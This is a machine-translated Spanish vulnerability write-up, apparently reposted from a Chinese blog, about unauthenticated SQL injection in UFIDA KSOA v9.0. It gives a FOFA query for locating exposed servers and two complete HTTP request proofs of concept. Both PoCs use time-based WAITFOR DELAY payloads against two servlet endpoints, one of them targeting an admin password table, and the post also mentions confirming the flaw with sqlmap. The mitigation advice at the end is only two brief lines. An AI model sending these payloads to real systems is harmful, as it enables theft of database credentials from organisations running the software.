Reaparición de vulnerabilidad de inyección SQL de UFIDA KSOA (HW0day)

News 2023-08-16 02:39:43 views: null

0x01 Introducción del producto

   UFIDA KSOA es un producto de nueva generación desarrollado bajo la guía del concepto SOA, es una infraestructura de TI unificada lanzada de acuerdo con las necesidades de vanguardia de las empresas de distribución que permite que los sistemas de TI establecidos por las empresas de distribución en varios períodos se comuniquen ayudar a las empresas de distribución a proteger la inversión original en TI, simplificar la gestión de TI, mejorar la competitividad y garantizar la realización de los objetivos estratégicos generales y las actividades de innovación de la empresa. 

Descripción general de la vulnerabilidad 0x02

   Existen vulnerabilidades de inyección de sql en la interfaz /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet de UFIDA KSOA y en la interfaz /servlet/imagefield Los atacantes no autenticados pueden obtener información y credenciales confidenciales de la base de datos a través de esta vulnerabilidad y, eventualmente, pueden hacer que el servidor chocar.

0x03 rango de influencia

UFIDA KSOA v9.0

0x04 Entorno de recurrencia

FOFA: app="Yonyou-Tiempo y Espacio KSOA"

 0x05 Reaparición de vulnerabilidad

PoC-1

GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27;WAITFOR%20DELAY%20%270:0:10%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

Retardo de inyección de construcción 10 segundos  

 autenticación de sqlmap

PoC-2

GET /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

 autenticación de sqlmap

 0x06 Sugerencia de reparación

plan provisional de mitigación

Limite las direcciones de origen de acceso y no abra el sistema a Internet a menos que sea necesario.

corrección de actualización

Actualice a una versión segura o aplique un parche.

 

 

 

 

Supongo que te gusta

Origin blog.csdn.net/qq_41904294/article/details/132265884
Recomendado
Clasificación
Diario
Más
2024-05-04(17)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(33)
2024-04-29(5)
2024-04-28(9)
2024-04-27(28)
2024-04-26(22)
2024-04-25(34)

Code World

© 2018 codetd.com